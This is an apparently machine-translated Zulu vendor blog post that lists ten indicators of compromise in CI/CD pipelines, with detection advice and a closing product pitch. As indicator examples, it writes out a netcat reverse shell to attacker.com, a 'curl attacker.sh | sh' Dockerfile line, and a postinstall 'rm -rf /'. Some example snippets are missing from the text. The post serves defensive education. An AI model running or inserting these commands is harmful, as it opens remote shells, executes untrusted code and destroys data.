Izinkomba Eziyi-10 Eziphezulu Zokuvumelana ku CI/CD Pipelines

Isingeniso: Yiziphi Izinkomba Zokuyekethisa Ekuphepheni Kwe-inthanethi?

Izinkomba zokuyekethisa ziyizibonakaliso zokuqala zokuxwayisa ukuthi uhlelo lwakho noma pipeline kungase kuhlaselwe. Ngamazwi alula, izinkomba zokuvumelana imikhondo eshiywe abahlaseli, njengokungajwayelekile logins, izinguquko zefayela, noma i-malware efihliwe. Ku Ukuphepha kwe-inthanethi kwe-IOC, zisebenza njengeminwe endaweni yobugebengu, zikunikeza ubufakazi obucacile bokuthi kukhona okungahambi kahle. Ngakho-ke, lapho abathuthukisi bebuza yiziphi izinkomba zokuvumelana, impendulo ayigcini nje kumaseva noma kuma-firewall, ihlanganisa nezingozi ezifihliwe kwesimanje CI/CD pipelines.

Kulezi pipelines, abahlaseli bangaphazamisa ikhodi, bafake ukuxhomeka okunonya, noma bashintshe izinyathelo zokwakha ngaphandle kokubonwa. Kodwa-ke, iziqondiso eziningi zisagxila kuphela kumaseva noma kumanethiwekhi. Ngenxa yalokho, uchungechunge lokuhlinzekwa kwesofthiwe selube ngenye yezinhloso ezilula kakhulu.

Yingakho ukuthola izinkomba zokuvumelana ku CI/CD pipelines ibalulekile. Ngaphezu kwakho konke, isiza amaqembu ukuvimba i-malware, ukuvikela izimfihlo, nokuvikela zonke izinyathelo zokulethwa kwesofthiwe.

Izinkomba Eziyi-10 Eziphezulu Zokuvumelana ku CI/CD Pipelines

Uma kuchazwe izinkomba zokuyekethisa, uhlu oluningi lugxila kumaseva noma kumanethiwekhi. CI/CD pipelines, abahlaseli bashiya izigxivizo zeminwe ezihluke kakhulu. Ukuqaphela lezi zimpawu kubalulekile ekuzivikeleni okusebenzayo. Ngezansi kunezimpawu eziyi-10 ze-IOC zokuphepha kwe-inthanethi okufanele ziqashelwe yibo bonke abathuthukisi kanye nonjiniyela wezokuphepha.

1. Izinguquko Zokuthembela Ezisolisayo

Esinye sezibonakaliso eziyinhloko zokuvumelana ku pipelineI-s iyisibuyekezo sokuthembela esingalindelekile nesingavamile. Abahlaseli bavame ukusebenzisa indawo yabathuthukisi bokwethemba kubaphathi bephakheji ukuze bangeze amaphakheji ayingozi.

Isibonelo, ku-npm a package.json i-diff ingafaka ngokuzumayo:

Izinguquko ezinjalo zingabonakala ziphephile kodwa zingafaka ikhodi ye-trojanized kuyo yonke i-build.

Impembelelo: izakhiwo ezisengozini zithola i-malware emthonjeni.

Ukutholwa: sebenzisa ukubuyekezwa kokuxhomekeka, ithrekhi yefayela lokukhiya iyahluka, futhi uskena amaphakheji amasha ngaso sonke isikhathi.

2. Ikhodi Efihliwe Ezakhiweni 

Ababhali be-malware bathembele ekufihleni ukuze bagweme ukubuyekezwa. Ngenxa yalokho, lesi sibonakaliso sokuyekethisa ku CI/CD pipelineAma-s angaba ngenye yezinto ezinzima kakhulu ukuzibamba. Eqinisweni, imithwalo efihliwe ivame ukungena emitatsheni yolwazi evulekile noma ezithombeni zesitsha ngaphandle kwesaziso.

Ngokwesibonelo:

  • Iphakheji ye-PyPI esebenzisa base64.b64decode("cHJpbnQoSGFja2VkKQ==").
  • Isithombe se-Docker esigcwele ama-binary e-UPX angadingeki.
  • I-JavaScript igcwele \x41\x42 ubalekela ukufihla abantshontshi beziqinisekiso.

Impembelelo: Ikhodi efihliwe isebenza buthule ngesikhathi sokwakha noma sokusebenza, okwenza lokhu kube uphawu olubalulekile ekuphepheni kwe-inthanethi kwe-IOC.
Ukutholwa: Hlanganisa SAST ngokuskena kwe-malware ukuze uhlabe uphawu lwekhodi efakwe ikhodi noma epakishiwe. Ngaphezu kwakho konke, phatha ukufiphaza njengefulegi elibomvu elidinga ukuphenywa okwengeziwe.

3. Izimfihlo Ezivezwe Ku-Git: Ingozi Yokuphepha Kwe-inthanethi Yakudala ye-IOC

CI/CD pipelinebavame ukuthola izimfihlo ngokuqondile ezindaweni zokugcina. Kodwa-ke, lapho kuvela izimfihlo ku-Git, ziba ngenye yezimpendulo ezicacile zombuzo othi “yiziphi izinkomba zokuyekethisa ku pipelines?” Uma iziqinisekiso sezifikile ku-Git, abahlaseli bangazisebenzisa unomphela.

Ngokwesibonelo:

  • A .env ifayela eliqukethe AWS_SECRET_KEY=.
  • Amathokheni afakwe ngaphakathi config.json.
  • Izimfihlo zisabonakala emlandweni we-Git ngisho nangemva kokususwa.

Impembelelo: Okhiye abaveziwe banikeza abahlaseli ukufinyelela okuqondile ku- CI/CD pipelines, izinhlelo zamafu, noma izizindalwazi. Ngakho-ke lokhu kungenye yezinkomba eziyingozi kakhulu zokuyekethisa.
Ukutholwa: Sebenzisa pre-commit hooks kanye nemisebenzi ye-CI yokuskena ngasese, bese uhoxisa okhiye abavuzayo ngokushesha. Ngaphezu kwalokho, sebenzisa ukulungiswa okuzenzakalelayo ukuze unciphise amafasitela okuvezwa.

4. Kuphazanyisiwe Pipeline Ukucushwa: Izinkomba Ezifihliwe Zokuvumelana

Pipeline ama-config ayizinhloso zenani eliphezulu ngoba ukuguqulwa okukodwa kuvame ukuphazamisa yonke indlela yokusebenzaNgenxa yalokho, kuphazanyisiwe pipeline amafayela ayingozi enkulu yezokuphepha kwe-inthanethi ye-IOC amathuluzi okuqapha avamile ukuwabona.

Ngokwesibonelo:

  • Ku-GitHub Actions:

  • Ku-GitLab: umsebenzi ononya ungeziwe ku- .gitlab-ci.yml elahla idatha ebucayi.
  • KuJenkins: sh "nc -e /bin/bash attacker.com 4444".

Impembelelo: Lezi zinguquko ezingavunyiwe ziguqula pipeline endaweni ehlala njalo yabahlaseli, okusobala ukuthi iwuphawu lokuyekethisa.
Ukutholwa: Qinisekisa ukuthi izilungiselelo ezisayiniwe ziyagcinwa, udinga ukuvunyelwa kwe-PR, futhi uqaphe imisebenzi engalindelekile. Ngaphezu kwalokho, setha guardrails ezivimba ngokuzenzakalelayo imisebenzi eguquliwe.

5. Unelungelo IaC Okuzenzakalelayo 

Izincazelo zengqalasizinda ezingalungiselelwanga kahle zivame ukudala iminyango yangemuva efihliwe. Ngenxa yalokho, okuzenzakalelayo okuyimfihlo ku IaC kuyingozi evamile yokuphepha kwe-inthanethi ye-IOC.

Ngokwesibonelo:

  • Ama-pod okunikeza ukuthunyelwa kwe-Kubernetes privileged: true.
  • Amashadi e-Helm aveza izinsizakalo nge 0.0.0.0:22.

Impembelelo: Abahlaseli bathola ukufinyelela ezingeni lezimpande noma badalule izinsizakalo zangaphakathi esidlangalaleni. Ngenxa yalokho, lezi zinkinga zandisa kakhulu indawo yokuhlasela.
Ukutholwa: Faka isicelo IaC ukuskena ukuze kuqinisekiswe amalungelo angaphansi ngaphambi kokuhlanganiswa. Ngaphezu kwalokho, qiniseka ukuthi konke ukucushwa kuyabuyekezwa njengengxenye ye pipeline.

6. Ukuziphatha Okungavamile Kokwakha 

Abahlaseli bavame ukushintsha pipeline ukuziphatha okuzongena ezenzweni ezimbi. Ngamanye amazwi, umsebenzi wokwakha ongavamile ungenye yezimpendulo ezicacile zalokho okuyizinkomba zokuyekethisa ku CI/CD pipelines.

Ngokwesibonelo:

  • Yakha izicelo zenethiwekhi eziphumayo ezizindeni ezingajwayelekile.
  • Iphrojekthi ye-Node.js ivele yaveza i-PowerShell ngesikhathi npm install.
  • Umsebenzi we-CI wokulanda ama-binary amakhulu angachazwanga kuma-script okwakha.

Impembelelo: Ukwakhiwa okuphazamisekile kungasebenza njengezindawo zokusabalalisa i-malware. Ngaphezu kwakho konke, kusabalalisa imithwalo enobungozi kuyo yonke i-deployment.
Ukutholwa: Gada amalogi okwakha ukuze uthole izinqubo noma ukuxhumana okungalindelekile. Ngaphezu kwalokho, lungiselela ukutholwa kwe-anomaly ukuze ubike ukuziphatha okungaphandle kwejwayelekile.

7. Izikripthi Zephakheji Ezinonya Njengezingozi Zokuphepha Kwe-inthanethi ze-IOC

Abaphathi bephakheji basekela umjikelezo wokuphila hooks abahlaseli abaxhaphazayo. Ngakho-ke, izikripthi ezinonya ku-npm, PyPI, noma ama-Dockerfiles ziyizinkomba eziqinile zokuyekethisa.

Ngokwesibonelo:

  • npm: postinstall iskripthi siyasebenza rm -rf / noma ukukhanyisa ku-C2.
  • I-PyPI: setup.py ukusebenzisa ikhodi ye-Python efihliwe ekufakweni.
  • I-Dockerfile: RUN curl attacker.sh | sh.

Impembelelo: Ukuhlasela kwenzeka ngesikhathi sokufakwa, ngaphambi kwanoma yikuphi ukuhlolwa kwesikhathi sokusebenza. Ngenxa yalokho, abathuthukisi bangase bangalokothi baqaphele kuze kube sekwephuze kakhulu.
Ukutholwa: Skena ama-manifest ephakheji ukuze uthole izikripthi zokufaka. Ngaphezu kwalokho, khawulela okuyingozi hooks in CI/CD imisebenzi yokunciphisa ukuchayeka.

8. Izinkomba Zokuyekethisa Ezibhalweni Zokubhalisa

Abahlaseli bashintsha noma bashintsha izinto ezisetshenziswayo ezingosini zokubhalisa, futhi lezi zenzakalo ziyizibonelo zezincwadi zalokho okuyizinkomba zokuyekethisa ochungechungeni lokunikezwa kwempahla. pipelines.

Ngokwesibonelo:

  • Ithegi yesithombe se-Docker ibuyekezwe buthule ngesendlalelo se-trojanized.
  • Iphakheji yangaphakathi ithathelwe indawo yinguqulo enobuthi.
  • i-npm namespace squatting, njengokuthi lodash-proxy.

Impembelelo: Yonke into eyakhiwe esebenzisa i-registry artifact iba sengozini. Akukhona lokho kuphela, kodwa ukuyekethisa kusakazekela ezinsizeni ezingezansi.
Ukutholwa: Qinisekisa ukuthi uhlola isiginesha nobuqotho kuzo zonke izikhangiso zokubhalisa. Ngaphezu kwalokho, landela umsuka wezinto zobuciko nge SBOM ukuqinisekiswa.

9. Umsebenzi Womsebenzisi Ongajwayelekile njengobufakazi be-IOC

Ama-akhawunti abekwe engcupheni cishe njalo ashiya imikhondo engavamile. Ngakho-ke, ukuziphatha okungavamile konjiniyela kuyisibonakaliso esinamandla sokuyekethisa.

Ngokwesibonelo:

  • Commits iphushwe ngo-3 ekuseni ngesikhathi sendawo.
  • Ukuvunyelwa kwe-PR ngama-akhawunti ngesikhathi sokuphumula.
  • Pipelines ibangelwa imvamisa engavamile.

Impembelelo: Abahlaseli basebenzisa kabi iziqinisekiso ezibiwe ukuze bafake izinguquko ezinonya. Phela, abangagunyaziwe commits ihlangana kalula nemisebenzi evamile yokusebenza.
Ukutholwa: Gada SCM umsebenzi weziphambeko, sebenzisa i-MFA, futhi ujikeleze amathokheni njalo. Ngaphezu kwalokho, qaphela uma kukhona okusolisayo commit noma amaphethini okuvunyelwa.

10. Ukwehluleka kobuqotho noma ukuhlolwa kwesiginesha ku-IOC Cybersecurity

Okujwayelekile kodwa okunganakwa inkomba yokuvumelana kuwukuhlolwa kobuqotho noma kokusayina okuhlulekile. Ku-IOC cybersecurity, lokhu kuhlolwa kuqinisekisa ukuthi ikhodi noma izinto zobuciko ziyiqiniso. Ukuziqaqa kushiya pipelinekuvezwa.

Izibonelo:

  • I-SHA256 hash engahambisani ne-checksum elindelekile.
  • Isiginesha ye-GPG engekho noma engavumelekile.
  • An SBOM okubonisa izinto zobuciko ezingasayiniwe.

Impembelelo: Ukwehluleka kobuqotho kuvame ukusho ukuphazamiseka, ubuthi berejista, noma ukufakwa kwe-malware.

Ukutholwa: Yenza ngokuzenzakalelayo ukuhlola isiginesha, sebenzisa ukuqinisekiswa kwe-checksum, bese uvimba izingxenye ezingasayiniwe. Ngaphezu kwakho konke, phatha ukuhlolwa ngakunye okuhlulekile njengobufakazi obucacile bokuvumelana.

CI/CD Izinkomba Zokuyekethisa Ngokushesha

Isibonakaliso Sokuvumelana (IOC) Umthelela ku CI/CD Pipelines Indlela Yokuthola
Izinguquko Zokuthembela Ezisolisayo Abahlaseli bafaka amalabhulali anonya kubaphathi bamaphakheji, okuholela ekwakhiweni okusengozini. Ifayela lokukhiya liyahluka, liphoqelele ukubuyekezwa kokuxhomekeka, futhi liskena ukuxhomekeka njalo.
Ikhodi Efihliwe Kuzakhiwo Imithwalo efihliwe iyasebenza ngesikhathi sokwakha noma isikhathi sokusebenza ngaphandle kokutholwa. Sebenzisa SAST kanye nokuskena kwe-malware ukuze kufakwe uphawu kumaphethini ekhodi ye-base64, hex, noma packed.
Izimfihlo Eziveziwe ku-Git Amathokheni avuzayo noma okhiye be-API banikeza abahlaseli ukufinyelela okuqondile ezinhlelweni ezibalulekile. Sebenzisa ukuskena okuyimfihlo ku-Git hooks futhi uhoxise iziqinisekiso ezivuvukile ngokuzenzakalelayo.
Iphazanyiswe Pipeline Ukulungiselelwa Imizila yokusebenza eguquliwe ivumela ukukhishwa kwedatha noma ukuqhubeka kwayo ngaphakathi CI/CD. Kudinga ukuvunyelwa kwe-PR, kuphoqelelwe ukulungiselelwa okusayiniwe, futhi kuqashwe pipeline izinguquko.
Ilungelo IaC Okuzenzakalelayo Imisebenzi evumela ngokweqile noma okuzenzakalelayo okungavikelekile kuveza izindawo zamafu. Skena amafayela e-Terraform, Kubernetes, kanye ne-Helm ukuze uthole ukuphoqelelwa kwamalungelo amancane.
Ukuziphatha Okungavamile Kokwakha Pipelines isetshenziswa njengezindawo zokusabalalisa i-malware noma ukunyakaza okuseceleni. Hlaziya amalogi okwakha ukuze uthole ukulanda okungalindelekile, izinqubo, noma izingcingo eziphumayo.
Izikripthi Zephakheji Ezinonya Izikripthi ezifihliwe zangaphambi/ngemuva kokufakwa ziqala ukulayishwa ngaphambi kokuhlolwa kwesikhathi sokusebenza. Vimba izikripthi ze-npm/PyPI eziyingozi bese ukhawulela ukwenziwa ku CI/CD imisebenzi.
Ubuthi Bokubhalisa Izinto zobuciko ezifakwe ku-Trojan zithatha indawo yezithombe ezithembekile noma ama-binary kuma-registry. Qinisekisa amasheke, uqinisekise ukuqinisekiswa kwesiginesha, bese uskena amarejista ngendlela efanele.
Umsebenzi Womsebenzisi Ongavamile Ama-akhawunti asengozini acindezela ubungozi commits noma i-trigger pipelines. Ukuphoqelela i-MFA, ukuqapha commits yezinkinga, bese uhlaziya login amaphethini.
Ukuhlolwa Kobuqotho Noma Ukusayina Okuhlulekile Kubonisa ikhodi ephazanyisiwe, ukuncika, noma izithombe ezingena ku- pipeline. Ukuhlola ubuqotho ngokuzenzakalelayo bese uvimba izingxenye ezingasayiniwe noma ezingahambisani.

Kungani Ukuphepha Kwe-inthanethi Kwendabuko Kwe-IOC Kungatholakali CI/CD Izingozi

Izinhlangano eziningi sezivele ziqapha izinkomba zokuyekethisa kumaseva, amakhompyutha, noma amanethiwekhi. Kodwa-ke, le ndlela yakudala yokuphepha kwe-inthanethi kwe-IOC ayikunaki CI/CD pipelines, manje eseyinye yezindawo zokuhlasela ezibaluleke kakhulu. Eqinisweni, pipelines zibonisa izimpawu zokuyekethisa ezihlukile amathuluzi avamile angenakuzibona.

Izinkomba Zokuyekethisa Ezokuphepha Kwendabuko

Ekuphepheni kwe-inthanethi okuvamile kwe-IOC, ukugxila kuvame ukuba ku:

  • okungajwayelekile loginamakheli e-IP noma ama-imeyili aphakamisa iziqinisekiso ezibiwe.
  • Ama-hashes amafayela asolisayo noma izinguquko zokubhalisa eziveza i-malware.
  • Ithrafikhi engalindelekile ephumayo ekhomba ekukhishweni kwedatha.

Lezi yizinkomba ezaziwayo ezilandelwayo futhi Uhlaka lwe-MITER ATT&CK, ehlanganisa ukuziphatha kanye namaqhinga avamile ezitha. Lezi yizimpawu eziwusizo. Kodwa-ke, zisebenza kakhulu ezinhlelweni zokusebenza noma kumanethiwekhi ezinkampani. Ngenxa yalokho, bayaphuthelwa ukuphazamiseka okucashile okwenzeka ekuqaleni kochungechunge lokuhlinzekwa kwesofthiwe.

Kungani CI/CD Pipelines Zihlukile

CI/CD pipelineama-s ayizindawo ezenzakalelayo lapho onjiniyela commit ikhodi, ukudonsa ukuncika, kanye nokwakha ukukhulula. Abahlaseli bayazi ukuthi ukuvumelana okukodwa lapha kusakazeka kuyo yonke i-deployment. Ngakho-ke, yiziphi izinkomba zokuvumelana ku CI/CD pipelineZibukeka zihluke kakhulu:

  • Ukuthembela okunonya kufakwe buthule ku-package.json noma ku-requirements.txt.
  • Okhiye be-API noma amathokheni avezwe ku-Git commitamafayela e-s noma e-.env.
  • Ikhodi efihliwe ifakwe kumaphakheji e-npm noma e-PyPI.
  • Amafayela e-Terraform noma e-Kubernetes anokuzenzakalelayo okungavikelekile okufana nokuthi: true.
  • Pipeline imisebenzi ehlelwe ukuze kukhishwe idatha noma kuvuleke iminyango yangemuva.

Lezi zimpawu zokuyekethisa ku CI/CD ukuhlala kungabonakali standard amathuluzi okuphepha.

Igebe ku-IOC Cybersecurity

Nakuba amaqembu amaningi eqonda ukubaluleka kwezinkomba zokuyekethisa, asathembele kuphela ekutholakaleni okuvela kumaseva nakumalogi enethiwekhi. Ngakho-ke, abahlaseli bangakha ubuthi noma bafake i-malware ngaphandle kokushiya iminonjana evamile. Yingakho izehlakalo ezifana namaphakheji e-XZ Utils backdoor noma ama-npm anonya zingatholakalanga kwaze kwaba yilapho zifika ekukhiqizweni.

Lezi zinhlobo zokuvumelana kwe-supply chain nazo ziqokonyiswa yi- CISIsiqondiso sokuphepha kwe-supply chain ka-A, okuxwayisa ngokuthi abahlaseli bayaqhubeka nokuhlasela CI/CD pipelinekanye nokubhaliswa.

I-Takeaway

Ukuphepha kwe-inthanethi kwendabuko kwe-IOC kuyadingeka kodwa akwanele. Ngaphezu kwakho konke, amaqembu kumele aqaphele izinkomba zokuyekethisa okuqondene ngqo CI/CD pipelines. Kulapho-ke kuphela lapho bengathola khona ikhodi enonya noma pipeline ukusetshenziswa kabi ngaphambi kokuba kusakazeke ezindaweni ezizungezile.

amathuluzi-we-sca-amathuluzi-okuhlaziya ukwakheka kwesofthiwe
Beka phambili, ulungise, futhi uvikele izingozi zesofthiwe yakho
Thola i-Akhawunti Yakho Yamahhala.
Awekho ikhadi lesikweletu elidingekayo.

Vikela Ukuthuthukiswa Kwesofthiwe Yakho Nokulethwa Kwayo

ne-Xygeni Product Suite